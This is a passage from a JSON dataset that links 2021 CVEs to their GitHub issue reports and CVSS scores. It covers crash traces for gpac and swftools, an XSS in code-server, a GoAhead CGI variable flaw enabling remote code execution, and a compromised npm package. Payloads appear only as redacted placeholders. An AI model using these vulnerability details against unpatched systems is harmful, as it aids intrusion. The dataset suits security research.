! APITAG exp golomb read failed, not enough bits in bitstream ! [AVC|H NUMBERTAG Warning: Error parsing NAL unit Segmentation fault (core dumped) ~~~~ Here is the trace reported by gdb: ~~~~ Stopped reason: SIGSEGV gef\u27a4 bt NUMBERTAG bccc NUMBERTAG in svc_parse_slice (si NUMBERTAG fffffff NUMBERTAG avc NUMBERTAG ae NUMBERTAG bs NUMBERTAG de0) at PATHTAG NUMBERTAG gf_avc_parse_nalu (bs NUMBERTAG de0, avc NUMBERTAG ae NUMBERTAG at PATHTAG NUMBERTAG d in naludmx_parse_nal_avc (is_islice=<synthetic pointer>, is_slice=<synthetic pointer>, skip_nal=<synthetic pointer>, nal_type NUMBERTAG size NUMBERTAG c, data NUMBERTAG b NUMBERTAG a1 \"trak\", ct NUMBERTAG ada NUMBERTAG at PATHTAG NUMBERTAG naludmx_process (filter NUMBERTAG a0bd0) at PATHTAG NUMBERTAG fe4c NUMBERTAG in gf_filter_process_task (task NUMBERTAG e NUMBERTAG at PATHTAG NUMBERTAG f7b NUMBERTAG in gf_fs_thread_proc APITAG at PATHTAG NUMBERTAG f NUMBERTAG in gf_fs_run (fsess=fsess APITAG at PATHTAG NUMBERTAG c NUMBERTAG b4b in gf_media_import APITAG at PATHTAG NUMBERTAG in convert_file_info APITAG \"tmp\", APITAG at PATHTAG NUMBERTAG aaa in APITAG (argc=<optimized out>, argv=<optimized out>) at PATHTAG NUMBERTAG f NUMBERTAG bb6 in generic_start_main NUMBERTAG f NUMBERTAG a5 in __libc_start_main NUMBERTAG c4e9 in _start () ~~~~",
  90567. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  90568. "severity": "HIGH",
  90569. "baseScore": 7.8,
  90570. "impactScore": 5.9,
  90571. "exploitabilityScore": 1.8
  90572. },
  90573. {
  90574. "CVE_ID": "CVE-2021-40570",
  90575. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1899",
  90576. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1899",
  90577. "Repo_new": "gpac/gpac",
  90578. "Issue_Created_At": "2021-08-27T09:02:37Z",
  90579. "description": "Segmentation fault caused by buffer overflow using mp4box in avc_compute_poc, APITAG FILETAG (unzip first) Program output: ~~~~ APITAG exp golomb read failed, not enough bits in bitstream ! APITAG exp golomb read failed, not enough bits in bitstream ! APITAG exp golomb read failed, not enough bits in bitstream ! APITAG exp golomb read failed, not enough bits in bitstream ! APITAG exp golomb read failed, not enough bits in bitstream ! [avc h NUMBERTAG offset_for_ref_frame overflow from poc_cycle_length [AVC|H NUMBERTAG Warning: Error parsing NAL unit [AVC|H NUMBERTAG Error parsing Sequence Param Set APITAG exp golomb read failed, not enough bits in bitstream ! APITAG exp golomb read failed, not enough bits in bitstream ! APITAG exp golomb read failed, not enough bits in bitstream ! APITAG exp golomb read failed, not enough bits in bitstream ! Segmentation fault (core dumped) ~~~~ Here is the trace reported by gdb: ~~~~ Stopped reason: SIGSEGV gef\u27a4 bt NUMBERTAG b NUMBERTAG f NUMBERTAG in avc_compute_poc (si=si APITAG at PATHTAG NUMBERTAG bce NUMBERTAG in gf_avc_parse_nalu (bs=<optimized out>, avc NUMBERTAG ae NUMBERTAG at PATHTAG NUMBERTAG d in naludmx_parse_nal_avc (is_islice=<synthetic pointer>, is_slice=<synthetic pointer>, skip_nal=<synthetic pointer>, nal_type NUMBERTAG size NUMBERTAG f, data NUMBERTAG dfba PATHTAG <incomplete sequence NUMBERTAG ct NUMBERTAG ada NUMBERTAG at PATHTAG NUMBERTAG naludmx_process (filter NUMBERTAG a0bd0) at PATHTAG NUMBERTAG fe4c NUMBERTAG in gf_filter_process_task (task NUMBERTAG ed0) at PATHTAG NUMBERTAG f7b NUMBERTAG in gf_fs_thread_proc APITAG at PATHTAG NUMBERTAG f NUMBERTAG in gf_fs_run (fsess=fsess APITAG at PATHTAG NUMBERTAG c NUMBERTAG b4b in gf_media_import APITAG at PATHTAG NUMBERTAG in convert_file_info APITAG \"tmp\", APITAG at PATHTAG NUMBERTAG aaa in APITAG (argc=<optimized out>, argv=<optimized out>) at PATHTAG NUMBERTAG f NUMBERTAG bb6 in generic_start_main NUMBERTAG f NUMBERTAG a5 in __libc_start_main NUMBERTAG c4e9 in _start () ~~~~ The reason for this bug is that the program does not check whether the length of a buffer fit its actual size. APITAG",
  90580. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  90581. "severity": "HIGH",
  90582. "baseScore": 7.8,
  90583. "impactScore": 5.9,
  90584. "exploitabilityScore": 1.8
  90585. },
  90586. {
  90587. "CVE_ID": "CVE-2021-40571",
  90588. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1895",
  90589. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1895",
  90590. "Repo_new": "gpac/gpac",
  90591. "Issue_Created_At": "2021-08-26T09:51:24Z",
  90592. "description": "Segmentation fault using mp4box in ilst_box_read, APITAG FILETAG (unzip first) Here is the trace reported by gdb: ~~~~ Stopped reason: SIGSEGV gef\u27a4 bt NUMBERTAG in ilst_box_read (s NUMBERTAG f NUMBERTAG bs NUMBERTAG c NUMBERTAG at PATHTAG NUMBERTAG ff1fa in gf_isom_box_read (bs NUMBERTAG c NUMBERTAG a NUMBERTAG f NUMBERTAG at PATHTAG NUMBERTAG gf_isom_box_parse_ex APITAG bs=bs APITAG APITAG parent_type NUMBERTAG at PATHTAG NUMBERTAG cf2 in gf_isom_parse_root_box APITAG bs NUMBERTAG c NUMBERTAG box_type=box_type APITAG APITAG APITAG at PATHTAG NUMBERTAG f in APITAG (mov=mov APITAG APITAG APITAG APITAG at PATHTAG NUMBERTAG e NUMBERTAG in gf_isom_parse_movie_boxes (progressive_mode=GF_FALSE, APITAG APITAG mo NUMBERTAG c NUMBERTAG at PATHTAG NUMBERTAG gf_isom_open_file APITAG \"tmp\", APITAG out>, tmp_dir NUMBERTAG at PATHTAG NUMBERTAG a NUMBERTAG in APITAG (argc=<optimized out>, argv=<optimized out>) at PATHTAG NUMBERTAG f NUMBERTAG bb6 in generic_start_main NUMBERTAG f NUMBERTAG a5 in __libc_start_main NUMBERTAG c4e9 in _start () ~~~~",
  90593. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  90594. "severity": "HIGH",
  90595. "baseScore": 7.8,
  90596. "impactScore": 5.9,
  90597. "exploitabilityScore": 1.8
  90598. },
  90599. {
  90600. "CVE_ID": "CVE-2021-40574",
  90601. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1897",
  90602. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1897",
  90603. "Repo_new": "gpac/gpac",
  90604. "Issue_Created_At": "2021-08-26T11:19:33Z",
  90605. "description": "System abort APITAG dumped) caused by buffer overflow using APITAG in gf_text_get_utf8_line. FILETAG (unzip first) This is the output of the program: ~~~~ stack smashing detected : APITAG terminated Aborted (core dumped) ~~~~ Here is the trace reported by gdb (the stack is smashed): ~~~~ Stopped reason: SIGABRT gef\u27a4 bt NUMBERTAG f NUMBERTAG d NUMBERTAG in raise NUMBERTAG f NUMBERTAG f3a in abort NUMBERTAG f NUMBERTAG ed6 in __libc_message NUMBERTAG f NUMBERTAG a NUMBERTAG in __fortify_fail NUMBERTAG f NUMBERTAG a3e in __stack_chk_fail NUMBERTAG f3ad in gf_text_get_utf8_line APITAG out>, APITAG out>, txt_in=<optimized out>, unicode_type NUMBERTAG at PATHTAG NUMBERTAG c NUMBERTAG c3a5c NUMBERTAG e in NUMBERTAG bcc NUMBERTAG fc NUMBERTAG in NUMBERTAG e NUMBERTAG c3aac3 in NUMBERTAG ec3a0c3a7c NUMBERTAG e in NUMBERTAG bdcd NUMBERTAG a5c3 in NUMBERTAG ac NUMBERTAG e in gf_isom_load_extra_boxes (movie NUMBERTAG c NUMBERTAG f NUMBERTAG c NUMBERTAG aacc2, moov_boxes=<optimized out>, moov_boxes_size=<optimized out>, udta_only=(unknown NUMBERTAG at PATHTAG NUMBERTAG in ?? () ~~~~",
  90606. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  90607. "severity": "HIGH",
  90608. "baseScore": 7.8,
  90609. "impactScore": 5.9,
  90610. "exploitabilityScore": 1.8
  90611. },
  90612. {
  90613. "CVE_ID": "CVE-2021-40575",
  90614. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1905",
  90615. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1905",
  90616. "Repo_new": "gpac/gpac",
  90617. "Issue_Created_At": "2021-09-01T06:02:21Z",
  90618. "description": "Segmentation fault casued by null pointer dereference using mp4box in mpgviddmx_process, APITAG FILETAG (unzip first) Here is the trace reported by gdb: ~~~~ Stopped reason: SIGSEGV gef\u27a4 bt NUMBERTAG a NUMBERTAG in memcpy (__len NUMBERTAG ffffffffffffffff, __src NUMBERTAG ada NUMBERTAG dest NUMBERTAG a NUMBERTAG at PATHTAG NUMBERTAG mpgviddmx_process (filter NUMBERTAG a0bd0) at PATHTAG NUMBERTAG fe3e NUMBERTAG in gf_filter_process_task (task NUMBERTAG f NUMBERTAG at PATHTAG NUMBERTAG f7ab NUMBERTAG in gf_fs_thread_proc APITAG at PATHTAG NUMBERTAG f NUMBERTAG b8 in gf_fs_run (fsess=fsess APITAG at PATHTAG NUMBERTAG c NUMBERTAG c8b in gf_media_import APITAG at PATHTAG NUMBERTAG in convert_file_info APITAG \"tmp\", APITAG at PATHTAG NUMBERTAG aaa in APITAG (argc=<optimized out>, argv=<optimized out>) at PATHTAG NUMBERTAG f NUMBERTAG in generic_start_main NUMBERTAG f NUMBERTAG f NUMBERTAG in __libc_start_main NUMBERTAG c4e9 in _start () ~~~~ Here is the trace reported by ASAN NUMBERTAG ERROR: APITAG negative size param: (size NUMBERTAG fdaf NUMBERTAG ff NUMBERTAG PATHTAG NUMBERTAG fdaf NUMBERTAG f1c in memcpy PATHTAG NUMBERTAG fdaf NUMBERTAG f1c in mpgviddmx_process PATHTAG NUMBERTAG fdaf NUMBERTAG efa0 in gf_filter_process_task PATHTAG NUMBERTAG fdaf NUMBERTAG f0e2 in gf_fs_thread_proc PATHTAG NUMBERTAG fdaf NUMBERTAG fb0 in gf_fs_run PATHTAG NUMBERTAG fdaf1ff NUMBERTAG f5 in gf_media_import PATHTAG NUMBERTAG ce NUMBERTAG c NUMBERTAG f in convert_file_info PATHTAG NUMBERTAG ce NUMBERTAG c NUMBERTAG in APITAG PATHTAG NUMBERTAG fdaef9a6bf6 in __libc_start_main ( PATHTAG NUMBERTAG ce NUMBERTAG be NUMBERTAG f9 in _start ( PATHTAG NUMBERTAG is located NUMBERTAG bytes to the right of NUMBERTAG byte region APITAG allocated by thread T0 here NUMBERTAG fdaf NUMBERTAG b NUMBERTAG in __interceptor_malloc ( PATHTAG NUMBERTAG fdaf NUMBERTAG a NUMBERTAG in filein_initialize PATHTAG NUMBERTAG fdaf NUMBERTAG b0f0 in gf_filter_new_finalize PATHTAG NUMBERTAG fdaf NUMBERTAG f NUMBERTAG in gf_filter_new PATHTAG NUMBERTAG fdaf NUMBERTAG in APITAG PATHTAG NUMBERTAG fdaf NUMBERTAG a NUMBERTAG in gf_fs_load_source PATHTAG NUMBERTAG fdaf1ff NUMBERTAG a6 in gf_media_import PATHTAG NUMBERTAG ce NUMBERTAG c NUMBERTAG f in convert_file_info PATHTAG NUMBERTAG ce NUMBERTAG c NUMBERTAG in APITAG PATHTAG NUMBERTAG fdaef9a6bf6 in __libc_start_main ( PATHTAG ) SUMMARY: APITAG negative size param ( PATHTAG NUMBERTAG ABORTING ~~~~",
  90619. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  90620. "severity": "MEDIUM",
  90621. "baseScore": 5.5,
  90622. "impactScore": 3.6,
  90623. "exploitabilityScore": 1.8
  90624. },
  90625. {
  90626. "CVE_ID": "CVE-2021-40609",
  90627. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1894",
  90628. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1894",
  90629. "Repo_new": "gpac/gpac",
  90630. "Issue_Created_At": "2021-08-26T04:44:12Z",
  90631. "description": "heap buffer overflow in MP4BOX at souce file PATHTAG FILETAG",
  90632. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  90633. "severity": "MEDIUM",
  90634. "baseScore": 5.5,
  90635. "impactScore": 3.6,
  90636. "exploitabilityScore": 1.8
  90637. },
  90638. {
  90639. "CVE_ID": "CVE-2021-41131",
  90640. "Issue_Url_old": "https://github.com/theupdateframework/python-tuf/issues/1527",
  90641. "Issue_Url_new": "https://github.com/theupdateframework/python-tuf/issues/1527",
  90642. "Repo_new": "theupdateframework/python-tuf",
  90643. "Issue_Created_At": "2021-08-20T18:14:23Z",
  90644. "description": "Metadata API: Delegation role names validation. Description of issue or feature request : Delegation role names are not restricted in any way in the spec, but they are targets metadata role names. They could be APITAG , APITAG or APITAG . The problem is that at some point those delegation role names are used when constructing an URL used to download the delegated target metadata file: URLTAG which is likely to be a problem. Current behavior : No validation is used for Delegation role names. Expected behavior : Escape special symbols like APITAG or APITAG .",
  90645. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:N/I:H/A:H",
  90646. "severity": "HIGH",
  90647. "baseScore": 8.7,
  90648. "impactScore": 5.8,
  90649. "exploitabilityScore": 2.2
  90650. },
  90651. {
  90652. "CVE_ID": "CVE-2021-41232",
  90653. "Issue_Url_old": "https://github.com/github/securitylab/issues/464",
  90654. "Issue_Url_new": "https://github.com/github/securitylab/issues/464",
  90655. "Repo_new": "github/securitylab",
  90656. "Issue_Created_At": "2021-10-29T07:59:45Z",
  90657. "description": "GO]: [ CVETAG : LDAP Injection All For One]. Query Relevant PR: URLTAG Report Constructing LDAP names or search filters directly from tainted data enables attackers to inject specially crafted values that changes the initial meaning of the name or filter itself. Successful LDAP injections attacks can read, modify or delete sensitive information from the directory service. This query identifies cases in which a LDAP query executes user provided input without being sanitized before. [x] Are you planning to discuss this vulnerability submission publicly? APITAG Post, social networks, etc). We would love to have you spread the word about the good work you are doing Result(s) Provide at least one useful result found by your query, on some revision of a real project. [go real world web URLTAG",
  90658. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  90659. "severity": "CRITICAL",
  90660. "baseScore": 9.8,
  90661. "impactScore": 5.9,
  90662. "exploitabilityScore": 3.9
  90663. },
  90664. {
  90665. "CVE_ID": "CVE-2021-41241",
  90666. "Issue_Url_old": "https://github.com/nextcloud/groupfolders/issues/1692",
  90667. "Issue_Url_new": "https://github.com/nextcloud/groupfolders/issues/1692",
  90668. "Repo_new": "nextcloud/groupfolders",
  90669. "Issue_Created_At": "2021-10-11T13:47:33Z",
  90670. "description": "Groupfolders for which a user has no reading rights APITAG Permissions) can still be copied and read out!. Example: Employee list / NC users: MA1 site manager MA2 accountant MA3 project employee Lisa MA4 project employee Hans NC folder structure (group folder): Group folder company location Berlin ...\u251c\u2500\u2500 Administration ..........\u251c\u2500\u2500 accounting ...\u251c\u2500\u2500 projects ..........\u251c\u2500\u2500 Project A ..........\u251c\u2500\u2500 Project B The following should be set via APITAG Permissions\u201d: Write and read rights to all folders should have: MA1 site manager Write and read rights to accounting folders should have: only MA2 accountant Write and read rights to project folder A should have: only MA3 project employee Lisa Write and read rights to project folder B should have: only MA4 project employee Hans All of this is easy to set using the APITAG Permissions\u201d in the APITAG However\u2026 For the root folder APITAG folder company location Berlin\u201d, all NC users must have at least reading rights, otherwise you won\u2019t see a folder at all\u2026 \u201cMA4 Projektmitarbeiter Hans\u201d does not initially see the APITAG Accounting\u201d folder. However, if he copies the complete root directory APITAG folder company location Berlin\u201d and inserts it into another of his own folders, all directories and their contents are visible to him. Can this copying of the \u201cinvisible\u201d folder or in general be prevented somehow? How would you solve this problem? Thank\u2019s for the Tipps. Matthias",
  90671. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
  90672. "severity": "MEDIUM",
  90673. "baseScore": 4.3,
  90674. "impactScore": 1.4,
  90675. "exploitabilityScore": 2.8
  90676. },
  90677. {
  90678. "CVE_ID": "CVE-2021-41392",
  90679. "Issue_Url_old": "https://github.com/BoostIO/BoostNote-App/issues/856",
  90680. "Issue_Url_new": "https://github.com/boostio/boostnote-app/issues/856",
  90681. "Repo_new": "boostio/boostnote-app",
  90682. "Issue_Created_At": "2021-03-09T15:02:25Z",
  90683. "description": "Potential Command Execution vulnerabilities introduced by FILETAG . Hi, We found that APITAG introduces dangerous API APITAG for arbitrary access on unsafe renderer process. This may lead to remote command execution. We suggest that a URL check should be enforced at L NUMBERTAG which enforces an allowlist on trusted URLs. URLTAG",
  90684. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  90685. "severity": "CRITICAL",
  90686. "baseScore": 9.8,
  90687. "impactScore": 5.9,
  90688. "exploitabilityScore": 3.9
  90689. },
  90690. {
  90691. "CVE_ID": "CVE-2021-41571",
  90692. "Issue_Url_old": "https://github.com/apache/pulsar/issues/11814",
  90693. "Issue_Url_new": "https://github.com/apache/pulsar/issues/11814",
  90694. "Repo_new": "apache/pulsar",
  90695. "Issue_Created_At": "2021-08-27T07:58:36Z",
  90696. "description": "FILETAG",
  90697. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
  90698. "severity": "MEDIUM",
  90699. "baseScore": 6.5,
  90700. "impactScore": 3.6,
  90701. "exploitabilityScore": 2.8
  90702. },
  90703. {
  90704. "CVE_ID": "CVE-2021-42054",
  90705. "Issue_Url_old": "https://github.com/xebd/accel-ppp/issues/156",
  90706. "Issue_Url_new": "https://github.com/xebd/accel-ppp/issues/156",
  90707. "Repo_new": "xebd/accel-ppp",
  90708. "Issue_Created_At": "2021-10-06T09:29:07Z",
  90709. "description": "The stack buffer underflow bug can be triggered even by remote client. Using version APITAG . The issue NUMBERTAG can be triggered even by remote client. Steps to reproduce NUMBERTAG Build access ppp: CODETAG NUMBERTAG Run APITAG , use pptp server: APITAG The running configuration APITAG is: ERRORTAG use APITAG and the APITAG is as follows: APITAG NUMBERTAG Install pptp client: APITAG NUMBERTAG Run the client: APITAG APITAG we need to follow the forked subprocesses and control them, therefore we used the APITAG to execute the pptp client instead of simply using APITAG NUMBERTAG Kill ( APITAG ) the client after authentication succeeded. Then the APITAG will crash due to ERRORTAG . ERRORTAG The detailed log of APITAG is shown in FILETAG .",
  90710. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  90711. "severity": "HIGH",
  90712. "baseScore": 7.5,
  90713. "impactScore": 3.6,
  90714. "exploitabilityScore": 3.9
  90715. },
  90716. {
  90717. "CVE_ID": "CVE-2021-42203",
  90718. "Issue_Url_old": "https://github.com/matthiaskramm/swftools/issues/176",
  90719. "Issue_Url_new": "https://github.com/matthiaskramm/swftools/issues/176",
  90720. "Repo_new": "matthiaskramm/swftools",
  90721. "Issue_Created_At": "2021-10-07T13:21:58Z",
  90722. "description": "heap use after free exists in the function APITAG in swftext.c. system info Ubuntu NUMBERTAG clang NUMBERTAG swfdump (latest master a9d NUMBERTAG Command line PATHTAG D APITAG APITAG output NUMBERTAG ERROR: APITAG heap use after free on address NUMBERTAG d6a0 at pc NUMBERTAG d bp NUMBERTAG fffffffd NUMBERTAG sp NUMBERTAG fffffffd NUMBERTAG WRITE of size NUMBERTAG at NUMBERTAG d6a0 thread T NUMBERTAG c in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG a NUMBERTAG in APITAG APITAG NUMBERTAG c2dc in fontcallback2 PATHTAG NUMBERTAG c6 in APITAG APITAG NUMBERTAG in main PATHTAG NUMBERTAG ffff NUMBERTAG a NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG c NUMBERTAG in _start ( PATHTAG NUMBERTAG d6a0 is located NUMBERTAG bytes inside of NUMBERTAG byte region APITAG freed by thread T0 here NUMBERTAG ffff6f NUMBERTAG ca in __interceptor_free ( PATHTAG NUMBERTAG db2c in APITAG PATHTAG NUMBERTAG PATHTAG ) previously allocated by thread T0 here NUMBERTAG ffff6f NUMBERTAG a in __interceptor_calloc ( PATHTAG NUMBERTAG c in rfx_calloc PATHTAG NUMBERTAG PATHTAG ) SUMMARY: APITAG heap use after free APITAG APITAG Shadow bytes around the buggy address NUMBERTAG c0c7fff9a NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c0c7fff9a NUMBERTAG fa fa fa fa fa fa fa fa NUMBERTAG fa NUMBERTAG c0c7fff9aa0: fa fa fa fa NUMBERTAG fa fa fa fa fa NUMBERTAG c0c7fff9ab NUMBERTAG fa fa fa fa fa NUMBERTAG c0c7fff9ac NUMBERTAG fa fa fa fa fa NUMBERTAG c0c7fff9ad0: fa fa fa fa[fd]fd fd fd fd fd fd fa fa fa fa fa NUMBERTAG c0c7fff9ae NUMBERTAG fa fa fa fa fa NUMBERTAG c0c7fff9af NUMBERTAG fa fa fa fa fa NUMBERTAG fa NUMBERTAG c0c7fff9b NUMBERTAG fa fa fa fa NUMBERTAG fa fa fa fa fa NUMBERTAG c0c7fff9b NUMBERTAG fa fa fa fa fa NUMBERTAG c0c7fff9b NUMBERTAG fa fa fa fa NUMBERTAG fa Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe NUMBERTAG ABORTING POC APITAG URLTAG",
  90723. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  90724. "severity": "HIGH",
  90725. "baseScore": 7.8,
  90726. "impactScore": 5.9,
  90727. "exploitabilityScore": 1.8
  90728. },
  90729. {
  90730. "CVE_ID": "CVE-2021-42218",
  90731. "Issue_Url_old": "https://github.com/ompl/ompl/issues/839",
  90732. "Issue_Url_new": "https://github.com/ompl/ompl/issues/839",
  90733. "Repo_new": "ompl/ompl",
  90734. "Issue_Created_At": "2021-10-07T07:30:39Z",
  90735. "description": "A memory leak in VFRRT. When I\u2019m testing ompl, here is a memory leak occured. After positioning,we found that the error is caused by the following code in APITAG FILETAG In line NUMBERTAG A motion object was requested with it\u2019s constructor,and also new a state in that motion.but in line NUMBERTAG the state in motion was assigned. The space applied in the constructor becomes a wild APITAG why memory leaks. We suggest to use the default constructor in line APITAG that: FILETAG I did my experiment on Ubuntu NUMBERTAG",
  90736. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  90737. "severity": "HIGH",
  90738. "baseScore": 7.5,
  90739. "impactScore": 3.6,
  90740. "exploitabilityScore": 3.9
  90741. },
  90742. {
  90743. "CVE_ID": "CVE-2021-4229",
  90744. "Issue_Url_old": "https://github.com/faisalman/ua-parser-js/issues/536",
  90745. "Issue_Url_new": "https://github.com/faisalman/ua-parser-js/issues/536",
  90746. "Repo_new": "faisalman/ua-parser-js",
  90747. "Issue_Created_At": "2021-10-22T13:46:48Z",
  90748. "description": "Security issue: compromised npm packages of ua parser js NUMBERTAG Questions about deprecated npm package ua parser js. Hi! See a warning at npm URLTAG APITAG First question Can we use range APITAG , or it is not safe? Second question Will you create a new package, or try to remove hijacked versions and continue update this package?",
  90749. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  90750. "severity": "HIGH",
  90751. "baseScore": 8.8,
  90752. "impactScore": 5.9,
  90753. "exploitabilityScore": 2.8
  90754. },
  90755. {
  90756. "CVE_ID": "CVE-2021-42342",
  90757. "Issue_Url_old": "https://github.com/embedthis/goahead/issues/305",
  90758. "Issue_Url_new": "https://github.com/embedthis/goahead/issues/305",
  90759. "Repo_new": "embedthis/goahead",
  90760. "Issue_Created_At": "2021-10-12T00:50:25Z",
  90761. "description": "Upload form vars bypass CGI prefixing.. Summary A security vulnerability exists with the file upload filter where user form variables can be passed to CGI scripts without being prefixed with the CGI prefix. Detail The upload filter accepts uploaded files with optional user form variables. When used with the CGI handler, these form variables are passed as O/S process environment variables. Form variables in Post requests are prefixed using the ME_GOAHEAD_CGI_VAR_PREFIX which is typically set to CGI_. However, the upload filter is not setting the untrusted var bit and so the CGI handler does not use the prefix. Threat Scope and Mitigation For users who have the upload filter configured and the CGI handler configured, the vulnerability can be used to perform remote code execution. CVE Pending. Remedy Deploy APITAG NUMBERTAG Credit Thanks to William Bowling at URLTAG and confirmed and extended by Zup. Please contact Embedthis if you require further information, test code or assistance at EMAILTAG .",
  90762. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  90763. "severity": "CRITICAL",
  90764. "baseScore": 9.8,
  90765. "impactScore": 5.9,
  90766. "exploitabilityScore": 3.9
  90767. },
  90768. {
  90769. "CVE_ID": "CVE-2021-42584",
  90770. "Issue_Url_old": "https://github.com/convos-chat/convos/issues/623",
  90771. "Issue_Url_new": "https://github.com/convos-chat/convos/issues/623",
  90772. "Repo_new": "convos-chat/convos",
  90773. "Issue_Created_At": "2021-10-12T19:56:57Z",
  90774. "description": "Vulnerability in URLTAG I have identified a stored cross site scripting vulnerability in URLTAG below is the POC for your reference: POC: APITAG by jberger) Reference Link: URLTAG",
  90775. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  90776. "severity": "MEDIUM",
  90777. "baseScore": 5.4,
  90778. "impactScore": 2.7,
  90779. "exploitabilityScore": 2.3
  90780. },
  90781. {
  90782. "CVE_ID": "CVE-2021-42648",
  90783. "Issue_Url_old": "https://github.com/cdr/code-server/issues/4355",
  90784. "Issue_Url_new": "https://github.com/coder/code-server/issues/4355",
  90785. "Repo_new": "coder/code-server",
  90786. "Issue_Created_At": "2021-10-14T08:16:39Z",
  90787. "description": "Cross Site Scripting\uff08XSS\uff09vulnerability in code server. APITAG APITAG Information Web Browser: firefox Local OS: Debian Remote OS: Debian Remote Architecture: APITAG NUMBERTAG Steps to Reproduce APITAG your browser and insert payload APITAG NUMBERTAG example: APITAG APITAG APITAG Screenshot FILETAG APITAG Notes APITAG This issue can be reproduced in VS Code: Yes",
  90788. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  90789. "severity": "MEDIUM",
  90790. "baseScore": 6.1,
  90791. "impactScore": 2.7,
  90792. "exploitabilityScore": 2.8
  90793. },
  90794. {
  90795. "CVE_ID": "CVE-2021-42859",
  90796. "Issue_Url_old": "https://github.com/michaelrsweet/mxml/issues/286",
  90797. "Issue_Url_new": "https://github.com/michaelrsweet/mxml/issues/286",
  90798. "Repo_new": "michaelrsweet/mxml",
  90799. "Issue_Created_At": "2021-10-15T03:56:39Z",
  90800. "description": "stack buffer overflow and heap buffer overflow. Hi, We have used Mini xml in our project, so I test NUMBERTAG and master branch and found something: Fisrt, there are some memory leaks in NUMBERTAG and master: ERRORTAG and : this is your testmxml.c: ERRORTAG also ,we I input an unformed string to APITAG there will be a stack buffer overflow and heap buffer overflow. I think if you add a longth check in mxml_string_getc when every pointer change(\"like ( s)++\"), will be better? Of course Maybe I have use it in a wrong . you can check it here: this is my testcase: CODETAG you can compile your lib with CFLAGS =+ \" g O0 fno omit frame pointer gline tables only fsanitize=address fsanitize address use after scope fsanitize=fuzzer no link\" and LDFLAGS =+\" fsanitize=fuzzer no link fsanitize=address\" and clang++ g O1 fno omit frame pointer gline tables only fsanitize=address fsanitize address use after scope fsanitize=fuzzer no link mxml_fuzzer.cpp I ./ fsanitize=fuzzer ./libmxml.a run and these are the backtrace: ERRORTAG ERRORTAG",
  90801. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  90802. "severity": "HIGH",
  90803. "baseScore": 7.5,
  90804. "impactScore": 3.6,
  90805. "exploitabilityScore": 3.9
  90806. },
  90807. {
  90808. "CVE_ID": "CVE-2021-42863",
  90809. "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/4793",
  90810. "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/4793",
  90811. "Repo_new": "jerryscript-project/jerryscript",
  90812. "Issue_Created_At": "2021-10-13T02:35:23Z",
